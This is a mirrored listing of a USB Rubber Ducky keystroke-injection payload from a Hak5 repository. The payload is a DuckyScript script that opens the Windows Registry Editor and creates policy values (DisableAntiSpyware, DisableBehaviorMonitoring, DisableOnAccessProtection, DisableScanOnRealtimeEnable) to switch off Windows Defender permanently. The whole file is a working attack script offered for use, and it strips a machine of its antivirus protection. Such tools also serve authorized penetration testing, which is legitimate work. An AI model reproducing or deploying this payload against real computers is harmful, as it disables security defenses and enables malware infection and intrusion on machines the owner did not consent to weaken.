Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/general/Disable-Windows-Defender-Permanently/payload.txt
2968 views
1
REM Title: Disable Windows Defender Permanently
2
REM Description: Disables windows defender permanently through Registry Editor, computer has to restart for changes to take effect
3
REM Author: https://github.com/HokkaidoInu
4
REM delay: You may want to change the delays and/or delete some, I have it like it is because I have really slow computer
5
DELAY 4000
6
GUI r
7
DELAY 4000
8
STRING regedit
9
DELAY 4000
10
ENTER
11
DELAY 4000
12
LEFT
13
DELAY 4000
14
ENTER
15
DELAY 4000
16
TAB
17
DELAY 4000
18
TAB
19
DELAY 4000
20
STRING HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
21
DELAY 4000
22
ENTER
23
DELAY 4000
24
APP
25
DELAY 4000
26
STRING n
27
DELAY 4000
28
STRING d
29
DELAY 4000
30
STRING DisableAntiSpyware
31
DELAY 4000
32
ENTER
33
DELAY 4000
34
APP
35
DELAY 4000
36
STRING m
37
DELAY 4000
38
STRING 1
39
DELAY 4000
40
ENTER
41
DELAY 4000
42
TAB
43
DELAY 4000
44
TAB
45
DELAY 4000
46
APP
47
DELAY 4000
48
STRING n
49
DELAY 4000
50
STRING k
51
DELAY 4000
52
STRING Real-Time Protection
53
DELAY 4000
54
ENTER
55
DELAY 4000
56
APP
57
DELAY 4000
58
STRING n
59
DELAY 4000
60
STRING d
61
DELAY 4000
62
STRING DisableBehaviorMonitoring
63
DELAY 4000
64
ENTER
65
DELAY 4000
66
APP
67
DELAY 4000
68
STRING m
69
DELAY 4000
70
STRING 1
71
DELAY 4000
72
ENTER
73
DELAY 4000
74
TAB
75
DELAY 4000
76
TAB
77
DELAY 4000
78
APP
79
DELAY 4000
80
STRING n
81
DELAY 4000
82
STRING d
83
DELAY 4000
84
STRING DisableOnAccessProtection
85
DELAY 4000
86
ENTER
87
DELAY 4000
88
APP
89
DELAY 4000
90
STRING m
91
DELAY 4000
92
STRING 1
93
DELAY 4000
94
ENTER
95
DELAY 4000
96
TAB
97
DELAY 4000
98
TAB
99
DELAY 4000
100
APP
101
DELAY 4000
102
STRING n
103
DELAY 4000
104
STRING d
105
DELAY 4000
106
STRING DisableScanOnRealtimeEnable
107
DELAY 4000
108
ENTER
109
DELAY 4000
110
APP
111
DELAY 4000
112
STRING m
113
DELAY 4000
114
STRING 1
115
DELAY 4000
116
ENTER
117
DELAY 4000
118
ALT F X
119
120